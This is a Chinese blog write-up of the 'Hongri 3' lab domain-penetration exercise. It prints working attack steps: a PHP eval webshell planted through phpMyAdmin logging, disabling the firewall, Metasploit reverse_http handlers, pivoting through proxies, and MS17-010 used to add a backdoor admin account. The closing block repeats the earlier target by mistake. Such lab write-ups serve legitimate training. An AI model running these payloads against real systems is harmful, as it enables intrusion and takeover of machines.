<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"sugarcrashx.github.io","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="实战于2021.9">
<meta property="og:type" content="article">
<meta property="og:title" content="红日三">
<meta property="og:url" content="https://sugarcrashx.github.io/2022/06/02/%E7%BA%A2%E6%97%A5%E4%B8%89/index.html">
<meta property="og:site_name" content="SugarCrash!">
<meta property="og:description" content="实战于2021.9">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://s2.loli.net/2022/05/29/LgEt1wih8PbRxkC.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/29/IcPEJL5jKnklZY7.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/29/UhbB6nQZyfoa7XM.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/29/8twkJT47vAeK31g.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/29/AUxK5mft27GYH3i.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/29/uU8MThHD3LrZ1ag.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/29/hXbw4vgOUk6NAYE.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/29/ilsQop4nC76xUKh.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/29/Npd2SAikYyzx14V.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/29/mOkwgIz3cXMtpND.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/29/Tf4tZBsGmM6Dlpb.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/29/EkAdOB3swheDSLz.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/29/SH1wVicWqyYZLGt.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/29/QJjL9qiGvlrVxye.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/29/hkbwyYSo8qRzdVi.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/29/YTPpzoxI7ej41UX.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/29/ZsMKB43l52xezyw.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/29/nlQoGkyDzUHZNAw.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/29/amkwBrZEfqF92uS.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/29/x2DJNtyo3jTPAQp.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/29/pbSFNmK6jOhUsEI.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/29/Vprh5vUcRgzSEbq.png">
<meta property="og:image" content="https://s2.loli.net/2022/05/29/ZRv8ViCruGjIY1s.png">
<meta property="article:published_time" content="2022-06-02T03:49:50.000Z">
<meta property="article:modified_time" content="2022-06-02T03:51:31.256Z">
<meta property="article:author" content="Lu1i丶">
<meta property="article:tag" content="内网靶场">
<meta property="article:tag" content="红日">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://s2.loli.net/2022/05/29/LgEt1wih8PbRxkC.png">

<link rel="canonical" href="https://sugarcrashx.github.io/2022/06/02/%E7%BA%A2%E6%97%A5%E4%B8%89/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>红日三 | SugarCrash!</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">SugarCrash!</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">记录学习，想找个师傅带带我</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://sugarcrashx.github.io/2022/06/02/%E7%BA%A2%E6%97%A5%E4%B8%89/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/1.PNG">
      <meta itemprop="name" content="Lu1i丶">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="SugarCrash!">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          红日三
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2022-06-02 11:49:50 / 修改时间：11:51:31" itemprop="dateCreated datePublished" datetime="2022-06-02T11:49:50+08:00">2022-06-02</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA/" itemprop="url" rel="index"><span itemprop="name">红日靶场</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>
  
  <span class="post-meta-item">
    
      <span class="post-meta-item-icon">
        <i class="far fa-comment"></i>
      </span>
      <span class="post-meta-item-text">Valine：</span>
    
    <a title="valine" href="/2022/06/02/%E7%BA%A2%E6%97%A5%E4%B8%89/#valine-comments" itemprop="discussionUrl">
      <span class="post-comments-count valine-comment-count" data-xid="/2022/06/02/%E7%BA%A2%E6%97%A5%E4%B8%89/" itemprop="commentCount"></span>
    </a>
  </span>
  
  

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>实战于2021.9</p>
<span id="more"></span>
<p><img src="https://s2.loli.net/2022/05/29/LgEt1wih8PbRxkC.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">红日靶场域渗透 </span><br><span class="line">win7 web服务 </span><br><span class="line">	ip：192.168.1.3 </span><br><span class="line">	ip:192.168.52.143 </span><br><span class="line">sever2008域控 </span><br><span class="line">	ip:192.168.52.138 </span><br><span class="line">sever2003 </span><br><span class="line">	ip:192.168.52.141</span><br></pre></td></tr></table></figure>


<p>访问的话是一个phpstudy探针，这个在信息收集里面挺有用的 一般存在phpstudy探针的话就存在phpmyadmin 或者phpinfo phpmyadmin存在并且密码是弱口令 root root 可以直接连进数据库 实战可以用扫描器扫一下他的哪个目录 phpmyadmin进去之后是直接可以getshell的 参考文章：</p>
<blockquote>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/sunny11/p/13581470.html">https://www.cnblogs.com/sunny11/p/13581470.html</a></p>
</blockquote>
<p><img src="https://s2.loli.net/2022/05/29/IcPEJL5jKnklZY7.png"><br><img src="https://s2.loli.net/2022/05/29/UhbB6nQZyfoa7XM.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">phpmyadmin getshell </span><br><span class="line">知道绝对路径写一句话 </span><br><span class="line">select &#x27;&lt;?php @eval($_POST[&#x27;hack&#x27;]);?&gt;&#x27; into outfile &#x27;C:/phpStudy/WWW/hack.php&#x27; </span><br><span class="line">报错发现写不了 </span><br><span class="line">SHOW VARIABLES LIKE &#x27;%secure%&#x27; </span><br><span class="line">SHOW global VARIABLES LIKE &#x27;%secure%&#x27;</span><br></pre></td></tr></table></figure>
<p><img src="https://s2.loli.net/2022/05/29/8twkJT47vAeK31g.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">查看这个变量 </span><br><span class="line">secure_file_priv 为null不能导入文件</span><br></pre></td></tr></table></figure>
<p><img src="https://s2.loli.net/2022/05/29/AUxK5mft27GYH3i.png"><br><img src="https://s2.loli.net/2022/05/29/uU8MThHD3LrZ1ag.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">show global variables like &#x27;%general_%&#x27; 查询日志 </span><br><span class="line">发现是关闭的，可以改成on开启 </span><br><span class="line"></span><br><span class="line">set global general_log = on; set global general_log_file=&#x27;c:/phpstudy/www/hack.php&#x27; 设置日志的路径 </span><br><span class="line">select &#x27;&lt;?php eval($_POST[hack]); ?&gt;&#x27;; </span><br><span class="line">查询这个语句，他会被日志写到hack.php这个文件里面</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p><img src="https://s2.loli.net/2022/05/29/hXbw4vgOUk6NAYE.png"><br>一句话已经写入到文件里面了，直接连就行了<br><img src="https://s2.loli.net/2022/05/29/ilsQop4nC76xUKh.png"><br>蚁剑连接<br>连接发现有个yxcms的目录应该是个网站<br>phpmyadmin里面也有newyxcms这个数据库 yxcms，如果知道有这个网站也可以搜一下公开的漏洞getshell<br>这个后台的模板也可以写入文件getshell<br><img src="https://s2.loli.net/2022/05/29/Npd2SAikYyzx14V.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">简单的信息收集</span><br><span class="line">netsh advfirewall show allprofiles 查看防火墙状态 </span><br><span class="line"></span><br><span class="line">关闭防火墙： </span><br><span class="line"></span><br><span class="line">netsh advfirewall set allprofiles state off</span><br></pre></td></tr></table></figure>
<p><img src="https://s2.loli.net/2022/05/29/mOkwgIz3cXMtpND.png"><br><img src="https://s2.loli.net/2022/05/29/Tf4tZBsGmM6Dlpb.png"><br><img src="https://s2.loli.net/2022/05/29/EkAdOB3swheDSLz.png"><br>whoami是个高权限 msfvenom写个马可以直接system权限 这次用cs 生成一个马，上传，运行，cs上线<br><img src="https://s2.loli.net/2022/05/29/SH1wVicWqyYZLGt.png"><br>上线第一步，设置睡眠时间<br>cs没有回显的话，去cdn概述看看开发模式开还是关，把他打开<br>sleep 0<br>用z1插件的信息收集查看安装的补丁<br>第二部抓他的一个密码<br>有个是MD5加密的，可以去解密一下<br>为了方便使用，可以和msf进行一个联动<br><img src="https://s2.loli.net/2022/05/29/QJjL9qiGvlrVxye.png"><br><img src="https://s2.loli.net/2022/05/29/hkbwyYSo8qRzdVi.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">信息收集 </span><br><span class="line">arp -a </span><br><span class="line">run get_local_subnet </span><br><span class="line">run post/windows/gather/arp_scanner </span><br><span class="line">rhosts=192.168.52.0/24 </span><br><span class="line">补丁信息 </span><br><span class="line">run post/windows/gather/enum_patches </span><br><span class="line">安装软件信息 </span><br><span class="line">run post/windows/gather/enum_applications</span><br></pre></td></tr></table></figure>

<p><img src="https://s2.loli.net/2022/05/29/YTPpzoxI7ej41UX.png"><br>开启3389服务，防火墙放行RDP规则 mstsc就可以开始连了<br>⚠️upload failed, check dev console<br><img src="https://s2.loli.net/2022/05/29/ZsMKB43l52xezyw.png"><br><img src="https://s2.loli.net/2022/05/29/nlQoGkyDzUHZNAw.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">msf+cs联动 </span><br><span class="line">新增加一个监听器 </span><br><span class="line">msf 设置一个监听 </span><br><span class="line">use exploit/multi/handler 这里注意要是http 如果是tcp是上不了线的 set payload windows/meterpreter/reverse_http </span><br><span class="line">set lhost 192.168.1.11 </span><br><span class="line">set lport 4444 exploit </span><br><span class="line">cs右键目标，</span><br><span class="line">新建会话选msf就行了 msf也上线了 </span><br><span class="line">getuid 看权限 </span><br><span class="line">getsystem </span><br><span class="line">msf内置模块administrator权限可以直接提成system权限</span><br></pre></td></tr></table></figure>
<p><img src="https://s2.loli.net/2022/05/29/amkwBrZEfqF92uS.png"><br><img src="https://s2.loli.net/2022/05/29/x2DJNtyo3jTPAQp.png"><br>⚠️upload failed, check dev console</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">添加一个路由 </span><br><span class="line">run autoroute -s 192.168.52.0/24 </span><br><span class="line">run autoroute -p 添加上去后用自带的模块扫描哪个网段的存活主机 </span><br><span class="line">run post/windows/gather/arp_scanner </span><br><span class="line">rhosts=192.168.52.0/24 </span><br><span class="line">发现了存活的主机192.168.52.143 192.168.52.138 </span><br><span class="line">background </span><br><span class="line"></span><br><span class="line">挂代理搞域控域成员 </span><br><span class="line">use auxiliary/server/socks_proxy </span><br><span class="line">show options </span><br><span class="line">set SRVHOST 192.168.1.11 </span><br><span class="line">set VERSION 4a exploit </span><br><span class="line">改完后看一下配置文件是不是自己的ip </span><br><span class="line">vim /etc/proxychains4.conf </span><br><span class="line"></span><br><span class="line">代理搞了之后信息收集了</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><img src="https://s2.loli.net/2022/05/29/pbSFNmK6jOhUsEI.png"><br><img src="https://s2.loli.net/2022/05/29/Vprh5vUcRgzSEbq.png"><br>信息收集，没有web的机器<br>做端口扫描<br>proxychains nmap -sT -Pn -T4 192.168.52.141<br>开放了445 也可以用cs的插件 选kb<br>直接用他给的编号打也行<br>通常打的17010 17010不光可以拿权限，也可以添加账户<br><img src="https://s2.loli.net/2022/05/29/ZRv8ViCruGjIY1s.png"></p>
<p>⚠️upload failed, check dev console</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">proxychains msfconsole use auxiliary/admin/smb/ms17_010_command 直接用这个模块 </span><br><span class="line">show options </span><br><span class="line">set rhosts 192.168.52.141 </span><br><span class="line">set command net user hack lw147369.. /add </span><br><span class="line">exploit </span><br><span class="line">set command net localgroup administrators hack /add </span><br><span class="line">exploit </span><br><span class="line">set command localgroup administrators hack </span><br><span class="line">exploit </span><br><span class="line">添加进了administrators组了</span><br></pre></td></tr></table></figure>
<p>同样的方法再拿域控</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">proxychains msfconsole use auxiliary/admin/smb/ms17_010_command 直接用这个模块 </span><br><span class="line">show options </span><br><span class="line">set rhosts 192.168.52.141 </span><br><span class="line">set command net user hack lw147369.. /add </span><br><span class="line">exploit </span><br><span class="line">set command net localgroup administrators hack /add </span><br><span class="line">exploit </span><br><span class="line">set command localgroup administrators hack </span><br><span class="line">exploit </span><br><span class="line">添加进了administrators</span><br></pre></td></tr></table></figure>
    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E5%86%85%E7%BD%91%E9%9D%B6%E5%9C%BA/" rel="tag"># 内网靶场</a>
              <a href="/tags/%E7%BA%A2%E6%97%A5/" rel="tag"># 红日</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/06/02/Horizontall/" rel="prev" title="Horizontall">
      <i class="fa fa-chevron-left"></i> Horizontall
    </a></div>
      <div class="post-nav-item">
    <a href="/2022/06/02/%E7%BA%A2%E6%97%A5%E5%9B%9B/" rel="next" title="红日四">
      红日四 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    <div class="comments" id="valine-comments"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Lu1i丶"
      src="/images/1.PNG">
  <p class="site-author-name" itemprop="name">Lu1i丶</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">34</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
        <span class="site-state-item-count">6</span>
        <span class="site-state-item-name">分类</span>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">14</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>


  <div class="links-of-blogroll motion-element">
    <div class="links-of-blogroll-title"><i class="fa fa-link fa-fw"></i>
      Links
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="https://txluck.github.io/" title="https:&#x2F;&#x2F;txluck.github.io&#x2F;" rel="noopener" target="_blank">永安寺</a>
        </li>
    </ul>
  </div>

      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Lu1i丶</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  


<script>
NexT.utils.loadComments(document.querySelector('#valine-comments'), () => {
  NexT.utils.getScript('//unpkg.com/valine/dist/Valine.min.js', () => {
    var GUEST = ['nick', 'mail', 'link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(item => {
      return GUEST.includes(item);
    });
    new Valine({
      el         : '#valine-comments',
      verify     : false,
      notify     : false,
      appId      : '2IjWrTCGWIUFwAsamIh2ezIu-gzGzoHsz',
      appKey     : 'EOJr4RJE5lM0E3ryx1vGuAPV',
      placeholder: "Just go go",
      avatar     : 'mm',
      meta       : guest,
      pageSize   : '10' || 10,
      visitor    : false,
      lang       : 'zh-cn' || 'zh-cn',
      path       : location.pathname,
      recordIP   : true,
      serverURLs : ''
    });
  }, window.Valine);
});
</script>

</body>
</html>
